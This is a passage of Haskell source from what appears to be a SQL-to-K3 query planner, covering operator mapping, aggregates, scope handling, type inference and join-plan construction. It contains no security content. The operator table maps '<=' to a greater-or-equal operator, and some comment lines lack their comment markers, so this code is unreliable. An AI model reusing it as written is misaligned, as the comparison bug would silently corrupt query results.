FullAlias _ nc _ -> Just $ "__" ++ sqlnmcomponent nc
sqloperator :: String -> ScalarExprList -> Maybe OperatorFn
sqloperator "-" [x] = Just (UnaryOp ONeg x)
sqloperator "!not" [x] = Just (UnaryOp ONot x)
sqloperator "+" [x,y] = Just (BinaryOp OAdd x y)
sqloperator "-" [x,y] = Just (BinaryOp OSub x y)
sqloperator "*" [x,y] = Just (BinaryOp OMul x y)
sqloperator "/" [x,y] = Just (BinaryOp ODiv x y)
sqloperator "%" [x,y] = Just (BinaryOp OMod x y)
sqloperator "=" [x,y] = Just (BinaryOp OEqu x y)
sqloperator "!=" [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<>" [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<" [x,y] = Just (BinaryOp OLth x y)
sqloperator "<=" [x,y] = Just (BinaryOp OGeq x y)
sqloperator ">" [x,y] = Just (BinaryOp OGth x y)
sqloperator ">=" [x,y] = Just (BinaryOp OGeq x y)
sqloperator "!and" [x,y] = Just (BinaryOp OAnd x y)
sqloperator "!or" [x,y] = Just (BinaryOp OOr x y)
sqloperator _ _ = Nothing
projectionexprs :: SelectItemList -> ScalarExprList
projectionexprs sl = map projectionexpr sl
projectionexpr :: SelectItem -> ScalarExpr
projectionexpr (SelExp _ e) = e
projectionexpr (SelectItem _ e _) = e
mkprojection :: ScalarExpr -> SelectItem
mkprojection e = SelExp emptyAnnotation e
aggregateexprs :: SelectItemList -> SQLParseM (ScalarExprList, [AggregateFn])
aggregateexprs sl = mapM aggregateexpr sl >>= return . unzip
aggregateexpr :: SelectItem -> SQLParseM (ScalarExpr, AggregateFn)
aggregateexpr (projectionexpr -> e) = case e of
FunCall _ nm args -> do
let fn = sqlnm nm
case (fn, args) of
("sum" , [e']) -> return (e', AggSum)
("count", [e']) -> return (e', AggCount)
("min" , [e']) -> return (e', AggMin)
("max" , [e']) -> return (e', AggMax)
(_, _) -> throwE $ "Invalid aggregate expression: " ++ show e
_ -> throwE $ "Invalid aggregate expression: " ++ show e
mkaggregate :: AggregateFn -> SelectItem -> ScalarExpr -> SQLParseM SelectItem
mkaggregate fn agg e = case fn of
AggSum -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "sum"]) [e]
AggCount -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "count"]) [e]
AggMin -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "min"]) [e]
AggMax -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "max"]) [e]
where rt (SelExp _ _) e' = return (SelExp emptyAnnotation e')
rt (SelectItem _ _ nmc) e' = return (SelectItem emptyAnnotation e' nmc)
isAggregate :: ScalarExpr -> SQLParseM Bool
isAggregate (FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("sum" , [_]) -> return True
("count", [_]) -> return True
("min" , [_]) -> return True
("max" , [_]) -> return True
(_, _) -> return False
isAggregate _ = return False
TODO : qualified , more expression types
substituteExpr :: [(Identifier, ScalarExpr)] -> ScalarExpr -> SQLParseM ScalarExpr
substituteExpr bindings e = case e of
(Identifier _ (sqlnmcomponent -> i)) -> return $ maybe e id $ lookup i bindings
(QIdentifier _ _) -> throwE "Cannot substitute qualified expressions."
(FunCall ann nm args) -> mapM (substituteExpr bindings) args >>= \nargs -> return $ FunCall ann nm nargs
_ -> return e
attrIds :: AttrEnv -> SQLParseM [Identifier]
attrIds env = mapM (\ptr -> adnn <$> sqglkupM ptr) $ Map.elems env
singletonPath :: AttrPath -> SQLParseM Identifier
singletonPath [i] = return i
singletonPath p = throwE $ "Invalid singleton path: " ++ show p
uniqueScopeQualifier :: ScopeId -> SQLParseM Identifier
uniqueScopeQualifier sid = do
(_, _, quals) <- sqclkupM sid
case quals of
[[q]] -> return q
_ -> throwE $ "Invalid unique scope qualifier: " ++ show quals
unqualifiedAttrs :: ScopeFrame -> SQLParseM [Identifier]
unqualifiedAttrs (_, ord, _) = forM ord $ singletonPath
qualifiedAttrs :: AttrPath -> ScopeFrame -> SQLParseM AttrEnv
qualifiedAttrs prefix (fr, _, q)
| prefix `elem` q = return $ Map.filterWithKey (\path _ -> prefix `isPrefixOf` path) fr
| otherwise = throwE $ unwords ["Could not find qualifier:", show prefix, "(", show q, ")"]
partitionAttrEnv :: ScopeFrame -> SQLParseM (AttrEnv, AttrEnv)
partitionAttrEnv (fr,_,_) = return $ Map.partitionWithKey (\path _ -> length path <= 1) fr
partitionCommonQualifedAttrEnv :: ScopeFrame -> SQLParseM (Map AttrPath AttrEnv)
partitionCommonQualifedAttrEnv (fr, ord, _) = return $ Map.foldlWithKey (addQualifiedCommon ord) Map.empty fr
where
addQualifiedCommon commons acc path ptr
| length path <= 1 = acc
| otherwise =
let (qual, attr) = (init path, last path) in
if [attr] `notElem` commons then acc else Map.alter (inject [attr] ptr) qual acc
inject path ptr Nothing = Just $ Map.singleton path ptr
inject path ptr (Just aenv) = Just $ Map.insert path ptr aenv
unqualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
unqualifiedScopeFrame (fr, ord, _)
| all (\path -> length path == 1) ord = return (Map.filterWithKey (\path _ -> length path == 1) fr, ord, [])
| otherwise = throwE "Unable to extract unqualified scope (lossy order specification)"
qualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
qualifiedScopeFrame (fr, _, q) = return (Map.filterWithKey (\path _ -> length path > 1) fr, [], q)
renameScopeFrame :: Identifier -> ScopeFrame -> SQLParseM ScopeFrame
renameScopeFrame i sf = do
(ufr, ord, _) <- unqualifiedScopeFrame sf
return (ufr <> Map.mapKeys (\path -> [i] ++ path) ufr, ord, [[i]])
concatScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
concatScopeFrames (lfr,lord,lq) (rfr,rord,rq) = return (lfr <> rfr, lord ++ rord, lq++rq)
mergeScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
mergeScopeFrames lsf@(_, lord, lquals) rsf@(_, rord, rquals) = do
let common = lord `intersect` rord
let nord = (nub $ lord ++ rord) \\ common
((lu,lq), (ru,rq)) <- (,) <$> partitionAttrEnv lsf <*> partitionAttrEnv rsf
let nu = (foldl (flip Map.delete) lu common) <> (foldl (flip Map.delete) ru common)
return (nu <> lq <> rq, nord, lquals ++ rquals)
mergeScopes :: ScopeId -> ScopeId -> SQLParseM ScopeId
mergeScopes id1 id2 = do
(lsf, rsf) <- (,) <$> sqclkupM id1 <*> sqclkupM id2
nsf <- mergeScopeFrames lsf rsf
sqcpushM nsf
outputTypeAndQualifier :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM (K3 Type, Maybe Identifier)
outputTypeAndQualifier t pfx alOpt = do
sym <- sasextM
case alOpt of
Nothing -> return (t, Just $ pfx ++ show sym)
Just al -> (,) <$> taliascolM al t <*> return (sqltablealias (pfx ++ show sym) al)
typedOutputScope :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
typedOutputScope t pfx alOpt = do
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextSchemaM tid rt
outputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
outputScope sid pfx alOpt = do
t <- scopeType sid
typedOutputScope t pfx alOpt
aliasedOutputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
aliasedOutputScope sid pfx alOpt = do
(t, ptrs) <- (,) <$> scopeType sid <*> sqcfptrsM sid
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextAliasM tid rt ptrs
exprOutputScope :: ScopeId -> Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
exprOutputScope sid pfx exprs = do
sym <- sasextM
let qual = Just $ pfx ++ show sym
sqgextExprM sid qual exprs
bmelem :: BindingMap
bmelem = BMTPrefix "elem"
ttag :: PlanTree -> PlanNode
ttag (Node tg _) = tg
replaceData :: Tree a -> a -> Tree a
replaceData (Node _ ch) n = Node n ch
isEquiJoin :: PlanTree -> Bool
isEquiJoin (ttag -> PJoin _ _ _ (_:_) [] _ _) = True
isEquiJoin _ = False
isJoin :: PlanTree -> Bool
isJoin (ttag -> PJoin _ _ _ _ _ _ _) = True
isJoin _ = False
trypath :: Maybe ScopeId -> SQLParseM a -> (ADGPtr -> SQLParseM a) -> AttrPath -> SQLParseM a
trypath sidOpt rfail rsuccess path = (\f -> maybe rfail f sidOpt) $ \sid -> do
pOpt <- sqcftrylkupM sid path
maybe rfail rsuccess pOpt
isAggregatePath :: PlanCPath -> Bool
isAggregatePath (PlanCPath _ _ [] [] _ _ _) = True
isAggregatePath _ = False
isGroupByAggregatePath :: PlanCPath -> Bool
isGroupByAggregatePath (PlanCPath _ _ (_:_) _ (_:_) _ _) = True
isGroupByAggregatePath _ = False
isNonAggregatePath :: PlanCPath -> Bool
isNonAggregatePath (PlanCPath _ _ [] _ [] Nothing _) = True
isNonAggregatePath _ = False
planNodeChains :: PlanNode -> Maybe [PlanCPath]
planNodeChains (PJoin _ _ _ _ _ _ chains) = Just chains
planNodeChains (PTable _ _ _ _ chains) = Just chains
planNodeChains (PSubquery _ qcl) = queryClosureChains qcl
treeChains :: PlanTree -> Maybe [PlanCPath]
treeChains (Node n _) = planNodeChains n
queryPlanChains :: QueryPlan -> Maybe [PlanCPath]
queryPlanChains (QueryPlan tOpt chains _) = if null chains then maybe Nothing treeChains tOpt else Just chains
queryClosureChains :: QueryClosure -> Maybe [PlanCPath]
queryClosureChains (QueryClosure _ plan) = queryPlanChains plan
pcext :: PlanCPath -> PlanTree -> SQLParseM PlanTree
pcext p (Node n ch) = case n of
PJoin psid osid jt jeq jp jpb chains -> return $ Node (PJoin psid osid jt jeq jp jpb $ chains ++ [p]) ch
PTable i tsid trOpt bmOpt chains -> return $ Node (PTable i tsid trOpt bmOpt $ chains ++ [p]) ch
PSubquery osid qcl -> pcextclosure p qcl >>= \nqcl -> return $ Node (PSubquery osid nqcl) ch
where pcextclosure p (QueryClosure fvs plan) = pcextplan p plan >>= \nplan -> return $ QueryClosure fvs nplan
pcextplan p (QueryPlan tOpt chains stgOpt) = return $ QueryPlan tOpt (chains ++ [p]) stgOpt
pcextSelect :: ScopeId -> SubqueryBindings -> ScalarExpr -> [PlanCPath] -> [PlanCPath]
pcextSelect sid qbs p [] = [PlanCPath sid [p] [] [] [] Nothing qbs]
pcextSelect _ qbs p pcl@(last -> c) = init pcl ++ [c {pcselects = pcselects c ++ [p], pcbindings = pcbindings c ++ qbs}]
pcextGroupBy :: SelectItemList -> SelectItemList -> PlanNode -> SQLParseM PlanNode
pcextGroupBy gbs aggs n@(PJoin _ osid _ _ _ _ chains) = do
aggsid <- aggregateSchema (Just $ chainSchema osid chains) gbs aggs
return $ n { pnjpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PTable _ sid _ _ chains) = do
aggsid <- aggregateSchema (Just $ chainSchema sid chains) gbs aggs
return $ n { pntpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PSubquery _ qcl) = extPlan (qcplan qcl) >>= \p -> return $ n { pnqclosure = qcl { qcplan = p } }
where extPlan p@(QueryPlan tOpt chains stgOpt) = do
sid <- planSchema p
aggsid <- aggregateSchema (Just sid) gbs aggs
return $ QueryPlan tOpt (chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []]) stgOpt
pcNonAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcNonAggExprs _ [] = []
pcNonAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
extract sid' (PlanCPath _ selects groupbys projects _ _ _) = (sid', selects ++ groupbys ++ projectionexprs projects)
pcAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcAggExprs _ [] = []
pcAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
extract sid' (PlanCPath _ _ _ _ aggs _ _) = (sid', projectionexprs aggs)
chainSchema :: ScopeId -> [PlanCPath] -> ScopeId
chainSchema sid chains = if null chains then sid else pcoutsid $ last chains
treeSchema :: PlanTree -> SQLParseM ScopeId
treeSchema (ttag -> PJoin _ sid _ _ _ _ chains) = return $ chainSchema sid chains
treeSchema (ttag -> PSubquery sid _) = return sid
treeSchema (ttag -> PTable _ sid _ _ chains) = return $ chainSchema sid chains
treeSchema _ = throwE "Invalid plan node input for treeSchema"
planSchema :: QueryPlan -> SQLParseM ScopeId
planSchema (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
planSchema (QueryPlan (Just t) [] _) = treeSchema t
planSchema (QueryPlan _ chains _) = return $ pcoutsid $ last chains
aggregateSchema :: Maybe ScopeId -> SelectItemList -> SelectItemList -> SQLParseM ScopeId
aggregateSchema (Just sid) [] [] = return sid
aggregateSchema sidOpt projects aggregates = do
let pexprs = projectionexprs projects
let aexprs = projectionexprs aggregates
(prji, prjids) <- foldM selectItemIdAcc (0, []) projects
(_, aggids) <- foldM selectItemIdAcc (prji, []) aggregates
prjt <- mapM (scalarexprType sidOpt) pexprs
aggt <- mapM (aggregateType sidOpt) aexprs
case sidOpt of
Nothing -> typedOutputScope (recT $ zip prjids prjt ++ zip aggids aggt) "__RN" Nothing
Just sid -> exprOutputScope sid "__AGG" $ (zip3 prjids prjt pexprs) ++ (zip3 aggids aggt aexprs)
refreshInputSchema :: PlanNode -> [PlanTree] -> SQLParseM PlanNode
refreshInputSchema (PJoin _ _ jt jeq jp jpb chains) [l,r] = do
(lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
jpsid <- mergeScopes lsid rsid
josid <- outputScope jpsid "__JR" Nothing
return $ PJoin jpsid josid jt jeq jp jpb chains
refreshInputSchema n [] = return n
refreshInputSchema _ _ = throwE "Invalid plan tree node for refreshInputSchema"
scopeType :: ScopeId -> SQLParseM (K3 Type)
scopeType sid = do
sf@(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
ptrs <- mapM (\path -> liftExceptM $ sflkup sf path) ord
nodes <- mapM sqglkupM ptrs
tcolM $ recT $ map (adnn &&& adnt) nodes
k3ScopeType :: ScopeId -> BindingMap -> SQLParseM (K3 Type)
k3ScopeType sid bm = do
t <- scopeType sid
rt <- telemM t
case (tnc rt, bm) of
((TRecord ids, ch), BMNone) -> return t
((TRecord ids, ch), BMTPrefix j) -> tcolM $ recT [(j,rt)]
((TRecord ids, ch), BMTFieldMap fb) -> namedRecordT fb (zip ids ch) >>= tcolM
((TRecord ids, ch), BMTVPartition pb) -> throwE "BMTVPartition mapping unsupported in k3ScopeType"
_ -> throwE "Invalid k3ScopeType element type"
where
namedRecordT fb idt = foldM (field fb) [] idt >>= return . recT
field fb acc (j,t) = maybe (err j) (extendNestedRecord t acc) $ Map.lookup j fb
extendNestedRecord _ fieldsAcc [] = throwE "Invalid nested record extension"
extendNestedRecord t fieldsAcc [i] = return $ fieldsAcc ++ [(i,t)]
extendNestedRecord t fieldsAcc (h:rest) =
case lookup h fieldsAcc of
Nothing -> do
subfields <- extendNestedRecord t [] rest
return $ fieldsAcc ++ [(h, recT subfields)]
Just (tnc -> (TRecord ids, tch)) -> do
subfields <- extendNestedRecord t (zip ids tch) rest
return $ map (replaceField h $ recT subfields) fieldsAcc
Just _ -> throwE $ "Existing non-record field when attempting to extend nested record"
replaceField dst nt (src,t) | src == dst = (dst, nt)
| otherwise = (src, t)
err j = throwE $ "No field binding found in namedRecordT for " ++ show j
k3PlanType :: BindingMap -> QueryPlan -> SQLParseM (K3 Type)
k3PlanType _ (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
k3PlanType bm p = do
sid <- planSchema p
case queryPlanChains p of
Just [] -> k3ScopeType sid bm
Just l | isAggregatePath (last l) -> do
t <- k3ScopeType sid bm
rt <- telemM t
case tnc rt of
(TRecord ids, ch) -> zeroT $ zip ids ch
_ -> throwE "Invalid k3 aggregate plan type"
_ -> k3ScopeType sid bm
ii . AST : AggregateFn , Extract , Interval , LiftOperator , NullLit , Placeholder , PositionalArg , WindowFn
scalarexprType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
scalarexprType _ (BooleanLit _ _) = return TC.bool
scalarexprType _ (StringLit _ _) = return TC.string
scalarexprType _ (NumberLit _ i) = return $ if "." `isInfixOf` i then TC.real else TC.int
scalarexprType _ (TypedStringLit _ tn _) = sqlnamedtype tn
scalarexprType _ (Cast _ _ tn) = sqlnamedtype tn
scalarexprType sidOpt (Identifier _ (sqlnmcomponent -> i)) = do
sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
trypath sidOpt (trace (unwords ["bottom", i, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) [i]
scalarexprType sidOpt (QIdentifier _ (sqlnmpath -> path)) = do
sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
trypath sidOpt (trace (unwords ["bottom", show path, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) path
scalarexprType sidOpt (Case _ whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (CaseSimple _ expr whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (FunCall _ nm args) = do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp _ x)) -> scalarexprType sidOpt x
(Just (BinaryOp _ x y)) -> do
xt <- scalarexprType sidOpt x
yt <- scalarexprType sidOpt y
if xt == yt then return xt
else throwE $ boxToString $ ["Binary operator sql type mismatch"]
%$ prettyLines xt %$ prettyLines yt
_ -> do
case (fn, args) of
("!between", [_,_,_]) -> return TC.bool
("!like", [_,_]) -> return TC.bool
("!notlike", [_,_]) -> return TC.bool
(_, _) -> throwE $ "Unsupported function in scalarexprType: " ++ fn
scalarexprType (Just sid) (Star _) = scopeType sid >>= telemM
scalarexprType (Just sid) (QStar _ (sqlnmcomponent -> n)) = do
(fr,_,_) <- sqclkupM sid
let ptrs = Map.elems $ Map.filterWithKey (\k _ -> [n] `isPrefixOf` k) fr
idt <- mapM (\p -> sqglkupM p >>= return . (adnn &&& adnt)) ptrs
return $ recT idt
scalarexprType _ (Exists _ _) = return TC.bool
scalarexprType _ (InPredicate _ _ _ _) = return TC.bool
scalarexprType _ e = throwE $ "Type inference unsupported for: " ++ show e
caselistType :: Maybe ScopeId -> [([ScalarExpr], ScalarExpr)] -> SQLParseM (K3 Type)
caselistType _ [] = throwE $ "Invalid empty case-list in caselistType"
caselistType sidOpt ((_,e):_) = scalarexprType sidOpt e
aggregateType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
aggregateType sidOpt agg@(FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("sum" , [e]) -> scalarexprType sidOpt e
("count", [e]) -> return $ TC.int
("min" , [e]) -> scalarexprType sidOpt e
("max" , [e]) -> scalarexprType sidOpt e
(_, _) -> throwE $ "Invalid aggregate expression: " ++ show agg
aggregateType _ agg = throwE $ "Invalid aggregate expression: " ++ show agg
selectItemId :: Int -> SelectItem -> SQLParseM (Int, Identifier)
selectItemId i (SelExp _ (Identifier _ (Nmc n))) = return (i, n)
selectItemId i (SelExp _ _) = return (i+1, "f" ++ show i)
selectItemId i (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, n)
selectItemIdAcc :: (Int, [Identifier]) -> SelectItem -> SQLParseM (Int, [Identifier])
selectItemIdAcc (i, acc) (SelExp _ (Identifier _ (Nmc n))) = return (i, acc ++ [n])
selectItemIdAcc (i, acc) (SelExp _ _) = return (i+1, acc ++ ["f" ++ show i])
selectItemIdAcc (i, acc) (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, acc ++ [n])
nodeBindingMap :: PlanNode -> SQLParseM BindingMap
nodeBindingMap (PJoin _ _ _ _ _ _ _) = return bmelem
nodeBindingMap _ = return BMNone
chainBindingMap :: PlanCPath -> SQLParseM BindingMap
chainBindingMap (PlanCPath _ _ gbs prjs aggs _ _)
| null gbs && null aggs = return bmelem
| otherwise = do
(prji, prjids) <- foldM selectItemIdAcc (0, []) prjs
(_, aggids) <- foldM selectItemIdAcc (prji, []) aggs
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" prjids
let (_, valPaths) = prefixTypePath nidx "value" aggids
return $ BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
where prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
treeBindingMap :: PlanTree -> SQLParseM BindingMap
treeBindingMap t = case treeChains t of
Nothing -> nodeBindingMap $ ttag t
Just [] -> nodeBindingMap $ ttag t
Just l -> chainBindingMap $ last l
planBindingMap :: QueryPlan -> SQLParseM BindingMap
planBindingMap (QueryPlan Nothing chains _)
| null chains = throwE "Invalid query plan with empty tree and chains"
| otherwise = chainBindingMap $ last chains
planBindingMap (QueryPlan (Just t) chains _)
| null chains = treeBindingMap t
| otherwise = chainBindingMap $ last chains
keyValuePrefix :: TypePath -> Bool
keyValuePrefix tp = ["key"] `isPrefixOf` tp || ["value"] `isPrefixOf` tp
keyValueMapping :: TypeMapping -> Bool
keyValueMapping tm = maybe False (either (\pfx -> pfx `elem` ["key", "value"]) keyValuePrefix) tm
isKVBindingMap :: BindingMap -> SQLParseM Bool
isKVBindingMap (BMTFieldMap fields) = return $ Map.foldl (\acc tp -> acc && keyValuePrefix tp) True fields
isKVBindingMap (BMTVPartition partitions) = return $ Map.foldl (\acc (_,tm) -> acc && keyValueMapping tm) True partitions
isKVBindingMap _ = return False
exprAttrs :: ScopeId -> ScalarExpr -> SQLParseM [ADGPtr]
exprAttrs sid e = case e of
(Identifier _ (sqlnmcomponent -> i)) -> sqcflkupM sid [i] >>= return . (:[])
(QIdentifier _ (sqlnmpath -> path)) -> sqcflkupM sid path >>= return . (:[])
(FunCall _ _ args) -> mapM (exprAttrs sid) args >>= return . concat
_ -> return []
attrEnvPtrs :: ScopeFrame -> [ADGPtr]
attrEnvPtrs (fr, _, _) = nub $ Map.elems fr
adgchaseM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseM roots ptr = sqglkupM ptr >>= \n -> chase [] ptr n
where chase path p n
| p `elem` path || p `elem` roots = return [(p, n)]
| null (adnch n) = return [(p, n)]
| otherwise = mapM (\c -> sqglkupM c >>= chase (path ++ [p]) c) (adnch n) >>= return . concat
adgchaseExprM :: [ADGPtr] -> ScopeId -> ScalarExpr -> SQLParseM ScalarExpr
adgchaseExprM roots sid expression = exprAttrs sid expression >>= \ptrs -> chase [] expression ptrs
where chase path e ptrs = do
let remptrs = filter (\p -> p `notElem` roots && p `notElem` path) ptrs
if null remptrs
then return e
else do
nodes <- mapM sqglkupM remptrs
let env = concatMap (\(i,eOpt) -> maybe [] (\e' -> [(i,e')]) eOpt) $ map (adnn &&& adne) nodes
ne <- substituteExpr env e
chase (path ++ remptrs) ne $ concatMap adnch nodes
adgchaseNodesM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseNodesM roots ptr = sqglkupM ptr >>= \node -> chase [(ptr,node)] [] ptr node
where chase acc path p n
| p `elem` path || p `elem` roots || null (adnch n) = return acc
| otherwise = foldM (rcr p path) acc (adnch n)
rcr p path acc cp = sqglkupM cp >>= \cn -> chase (acc ++ [(cp,cn)]) (path ++ [p]) cp cn
baseRelationsP :: ADGPtr -> SQLParseM [Identifier]
baseRelationsP ptr = adgchaseM [] ptr >>= return . nub . catMaybes . map (adnr . snd)
baseRelationsE :: ScopeId -> ScalarExpr -> SQLParseM [Identifier]
baseRelationsE sid expression = do
ptrs <- exprAttrs sid expression
mapM (adgchaseM []) ptrs >>= return . nub . catMaybes . map (adnr . snd) . concat
baseRelationsS :: ScopeId -> SQLParseM [Identifier]
baseRelationsS sid = do
ptrs <- sqcfptrsM sid
mapM (adgchaseM []) ptrs >>= return . nub . catMaybes . map (adnr . snd) . concat
rebaseAttrsToRoots :: [ADGPtr] -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrsToRoots roots ptrs = mapM (adgchaseM roots) ptrs >>= return . nub . map fst . concat
rebaseAttrs :: ScopeId -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrs sid ptrs = sqclkupM sid >>= \fr -> rebaseAttrsToRoots (attrEnvPtrs fr) ptrs
rebaseExprsToRoots :: ScopeId -> [ADGPtr] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprsToRoots sid roots exprs = mapM (adgchaseExprM roots sid) exprs
rebaseExprs :: ScopeId -> [ScopeId] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprs ssid dsidl exprs = do
frs <- mapM sqclkupM dsidl
let ptrs = nub $ concatMap attrEnvPtrs frs
rebaseExprsToRoots ssid ptrs exprs
rebaseSelectItemsToRoots :: ScopeId -> [ADGPtr] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItemsToRoots ssid roots items = mapM rebase items
where rebase (SelExp ann e) = adgchaseExprM roots ssid e >>= \ne -> return (SelExp ann ne)
rebase (SelectItem ann e nmc) = adgchaseExprM roots ssid e >>= \ne -> return (SelectItem ann ne nmc)
rebaseSelectItems :: ScopeId -> [ScopeId] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItems ssid dsidl items = do
frs <- mapM sqclkupM dsidl
let ptrs = nub $ concatMap attrEnvPtrs frs
rebaseSelectItemsToRoots ssid ptrs items
localizeInputExprs :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM (ScalarExprList, ScalarExprList, ScalarExprList)
localizeInputExprs sid lsid rsid exprs = do
[lfr, rfr] <- mapM sqclkupM [lsid, rsid]
let (lroots, rroots) = (nub $ attrEnvPtrs lfr, nub $ attrEnvPtrs rfr)
foldM (localize lroots rroots $ nub $ concat [lroots, rroots]) ([], [], []) exprs
where
localize lroots rroots roots (lacc, racc, acc) e = do
eptrs <- exprAttrs sid e
reptrs <- rebaseAttrsToRoots roots eptrs
return $
if reptrs `intersect` lroots == reptrs then (lacc++[e], racc, acc)
else if reptrs `intersect` rroots == reptrs then (lacc, racc++[e], acc)
else (lacc, racc, acc++[e])
sqloptimize :: [Statement] -> SQLParseM [SQLDecl]
sqloptimize l = mapM stmt l
where
stmt (CreateTable _ nm attrs _) = do
t <- sqltabletype attrs
sqrextM (sqlnm nm) t
return $ SQLRel (sqlnm nm, t)
stmt (QueryStatement _ q) = do
qcl <- query q
return $ SQLQuery $ qcplan qcl
stmt s = throwE $ "Unimplemented SQL stmt: " ++ show s
query (Select _ _ selectL tableL whereE gbL havingE _ _ _) = queryPlan selectL tableL whereE gbL havingE
query q = throwE $ "Unhandled query " ++ show q
queryPlan selectL tableL whereE gbL havingE = do
tfvOpt <- joinTree tableL
case tfvOpt of
Nothing -> do
(prjs, aggs, gsid) <- aggregatePath Nothing selectL
(efvs, subqs) <- varsAndQueries Nothing $ projectionexprs $ prjs ++ aggs
return $ QueryClosure efvs $ QueryPlan Nothing [PlanCPath gsid [] [] prjs aggs Nothing subqs] Nothing
Just (t, fvs) -> do
sid <- treeSchema t
conjuncts <- maybe (return []) splitConjuncts whereE
(nt, remconjuncts) <- predicatePushdown (Just sid) conjuncts t
(prjs, aggs, gsid) <- aggregatePath (Just sid) selectL
if all null [remconjuncts, gbL, projectionexprs prjs, projectionexprs aggs]
then return $ QueryClosure fvs $ QueryPlan (Just nt) [] Nothing
else do
(gnt, naggs) <- if null gbL then return (nt, aggs) else groupByPushdown nt sid (map mkprojection gbL) aggs
(efvs, subqs) <- debugGBPushdown gnt
$ varsAndQueries (Just sid) $ remconjuncts ++ gbL ++ (projectionexprs $ prjs ++ naggs)
(hfvs, hsubqs) <- maybe (return ([], [])) (\e -> varsAndQueries (Just gsid) [e]) havingE
let chains = [PlanCPath gsid remconjuncts gbL prjs naggs havingE $ subqs ++ hsubqs]
return $ QueryClosure (nub $ fvs ++ efvs ++ hfvs) $ QueryPlan (Just gnt) chains Nothing
debugGBPushdown x y = if False then y else trace (boxToString $ ["GB pushdown result"] %$ prettyLines x) y
joinTree [] = return Nothing
joinTree (h:t) = do
n <- unaryNode h
(tree, tfvs) <- foldM binaryNode n t
return $ Just (tree, tfvs)
binaryNode (lhs, lfvs) n = do
(rhs, rfvs) <- unaryNode n
(lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
jpsid <- mergeScopes lsid rsid
josid <- aliasedOutputScope jpsid "__CP" Nothing
return (Node (PJoin jpsid josid Nothing [] [] [] []) [lhs, rhs], nub $ lfvs ++ rfvs)
unaryNode n@(Tref _ nm al) = do
let tid = sqltablealias ("__" ++ sqlnm nm) al
t <- sqrlkupM $ sqlnm nm
rt <- taliascolM al t
tsid <- sqgextSchemaM tid rt
return (Node (PTable (sqlnm nm) tsid (Just n) Nothing []) [], [])
unaryNode (SubTref _ q al) = do
qcl <- query q
nqsid <- planSchema $ qcplan qcl
qalsid <- outputScope nqsid "__RN" (Just al)
return (Node (PSubquery qalsid qcl) [], qcfree qcl)
unaryNode (JoinTref _ jlt nat jointy jrt onE jal) = do
(lhs, lfvs) <- unaryNode jlt
(rhs, rfvs) <- unaryNode jrt
